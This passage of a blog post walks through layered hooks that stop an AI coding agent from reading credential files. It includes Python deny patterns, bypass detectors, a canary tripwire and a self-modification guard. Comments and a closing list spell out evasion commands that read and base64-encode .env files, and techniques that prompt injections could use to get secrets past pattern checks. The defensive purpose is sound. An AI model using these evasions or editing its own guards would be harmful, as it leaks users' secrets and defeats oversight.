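CREDENTIAL_PATTERN = re.compile(r"(\.env|\.ssh|id_rsa|config.*database)")


def is_credential_access(command: str) -> bool:
    """True if the command text mentions a credential path."""
    return CREDENTIAL_PATTERN.search(command) is not None


def main(stdin=sys.stdin) -> int:
    """Return the exit code the hook should finish with."""
    # Assumed payload shape: {"tool_name": "Bash", "tool_input": {"command": "..."}}
    try:
        payload = json.load(stdin)
        command = str(payload["tool_input"].get("command", ""))
    except (json.JSONDecodeError, KeyError, TypeError, AttributeError):
        print("BLOCKED: unreadable hook payload", file=sys.stderr)
        return 2  # fail closed when the payload cannot be parsed
    if is_credential_access(command):
        print("BLOCKED: Credential access denied", file=sys.stderr)
        return 2  # assumed blocking exit code
    return 0
```

To run it as a hook, end the file with `sys.exit(main())`. The pattern is deliberately broad, so it also blocks harmless commands that merely mention a string like `.environment`.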

Layer 2: Bypass Detection

During testing, I found gaps. Pipes bypass simple pattern matching. python3 bypasses every grep-based hook. cp bypasses read guards completely. The detection system catches these:

# Catches: cat file.env | base64
# Catches: python3 -c "print(open('.env').read())"
# Catches: cp .env /tmp/x && cat /tmp/x
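One way to express these three cases is as named rules over the command string. This is a rough Python sketch with hypothetical rule names and regexes; it is not the detection system from the post.

```python
import re

# Paths treated as sensitive in this sketch (an assumption, not a full list).
SENSITIVE = r"(\.env\b|\.ssh|id_rsa)"

BYPASS_RULES = {
    # A sensitive path whose contents are piped into an encoder.
    "pipe-to-encoder": re.compile(SENSITIVE + r".*\|\s*(base64|xxd|openssl)\b"),
    # An interpreter invoked with a sensitive path somewhere in its arguments.
    "interpreter-read": re.compile(r"\b(python3?|node|perl|ruby)\b.*" + SENSITIVE),
    # A sensitive file copied, moved, or linked to another location.
    "copy-then-read": re.compile(r"\b(cp|mv|ln)\b.*" + SENSITIVE),
}


def detect_bypass(command: str) -> list[str]:
    """Return the names of every bypass rule the command matches."""
    return [name for name, rule in BYPASS_RULES.items() if rule.search(command)]
```

Each of the three commented commands above matches exactly one rule. The rules only see text that appears literally in the command, so a script file that builds the path at runtime still gets through.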

Layer 3: Canary Counter-Injection

A fake credentials file that counter-injects if accessed. If Claude tries to read ~/.env_fake, the system detects the breach and blocks all subsequent operations.
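The "blocks all subsequent operations" part can be modeled as a tripwire that latches once the canary is touched. The Python sketch below assumes a hypothetical lock-file path and class name. It does not model whatever the canary file itself contains.

```python
from pathlib import Path

CANARY_NAME = ".env_fake"  # canary file name from the text above


class Tripwire:
    """Blocks every command once any command has referenced the canary file."""

    def __init__(self, lock_file: Path):
        # lock_file is a hypothetical marker path; keeping state on disk lets
        # it survive across separate hook invocations.
        self.lock_file = lock_file

    def check(self, command: str) -> bool:
        """Return True if the command may run, False if it must be blocked."""
        if self.lock_file.exists():
            return False  # already tripped: stay locked until a human resets it
        if CANARY_NAME in command:
            self.lock_file.write_text(command)  # record what tripped the wire
            return False
        return True
```

Deleting the lock file is the manual reset. For that reason the lock file should live somewhere the agent cannot write.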

Layer 4: Self-Modification Guard

Prevents the AI from disabling its own security by editing hook files or changing permissions on the guard system.
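For file edits, the core of such a guard is a path check that survives `..` segments and symlinks. This is a minimal Python sketch; is_protected() and its parameters are hypothetical names.

```python
from pathlib import Path


def is_protected(target: str, protected_dirs: list[Path], cwd: Path) -> bool:
    """True if target resolves to a location inside any protected directory."""
    # Resolve relative to cwd so "../hooks/guard.sh" cannot dodge the check.
    resolved = (cwd / Path(target).expanduser()).resolve()
    for directory in protected_dirs:
        root = directory.resolve()
        if resolved == root or root in resolved.parents:
            return True
    return False
```

A write or edit tool call is refused when `is_protected(path, [hooks_dir], cwd)` returns True. Shell commands that change the same files, such as chmod or mv, need their own check on the command string.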

Layers 5-7: Monitoring, Logging, and Network Isolation

File access logs, network request monitoring, and restricted outbound connections for sensitive operations.
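For the logging layer, an append-only JSON Lines file is usually enough to reconstruct what the agent tried to do. The Python sketch below uses hypothetical field names and a hypothetical log_tool_call() helper.

```python
import json
import time
from pathlib import Path


def log_tool_call(log_path: Path, tool_name: str, detail: str, decision: str) -> dict:
    """Append one tool-call record to a JSON Lines log and return it."""
    entry = {
        "ts": time.time(),     # Unix timestamp of the attempt
        "tool": tool_name,     # e.g. "bash"
        "detail": detail,      # command text or file path
        "decision": decision,  # "allow", "ask", or "deny"
    }
    with log_path.open("a", encoding="utf-8") as handle:
        handle.write(json.dumps(entry) + "\n")
    return entry
```

Logging denied calls matters as much as logging allowed ones. A burst of denials is often the first visible sign of an injection attempt.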

What I Learned Testing This

The attack vectors are more subtle than obvious credential grabs. Real prompt injections would:

Use Python to bypass bash pattern matching
Copy sensitive files to /tmp first, then read them
Base64 encode outputs to hide obvious data exfiltration
Use environment variable expansion to obfuscate commands

Simple deny lists catch amateur-hour attacks. Sophisticated attacks require layered detection.
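A short experiment shows where a single pattern check stops working. In this Python sketch the sample commands are made up for illustration, and the regex stands in for a simple deny list.

```python
import re

# A deliberately simple deny pattern, standing in for a basic deny list.
NAIVE_DENY = re.compile(r"(\.env|\.ssh|id_rsa)")


def naive_blocks(command: str) -> bool:
    """True if the simple pattern would block this command."""
    return NAIVE_DENY.search(command) is not None


# Made-up sample commands, one per evasion style.
SAMPLES = {
    "direct read": "cat .env",
    "variable expansion": 'f=".en"; cat "${f}v"',
    "copied file": "cat /tmp/x",  # second step, after the file was copied
}

# Labels of the samples that slip past the simple pattern.
missed = [label for label, cmd in SAMPLES.items() if not naive_blocks(cmd)]
```

Here `missed` contains the variable-expansion and copied-file samples. Neither command spells out a sensitive name, and that is the gap the additional layers exist to cover.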

The Productivity vs Security Balance

100% safety means no terminal access, and that kills the productivity that makes AI coding agents valuable. The goal is to make casual prompt injections fail and to catch obvious exfiltration attempts.

I still use Claude Code daily. My n8n-based AI agent follows similar security patterns. The difference is I now run it inside a container with explicit guards instead of trusting the AI to behave.

This connects to broader themes around AI agent infrastructure and how we secure systems that operate autonomously. Even AI-powered search optimization tools need similar protections when they access your content management systems.

Audit your setup. Check what your AI coding agent can actually access. The productivity gains are real, but so are the risks.

Credit to Slava Spitsyn for raising this issue publicly. His security hooks repository covers the technical implementation details.
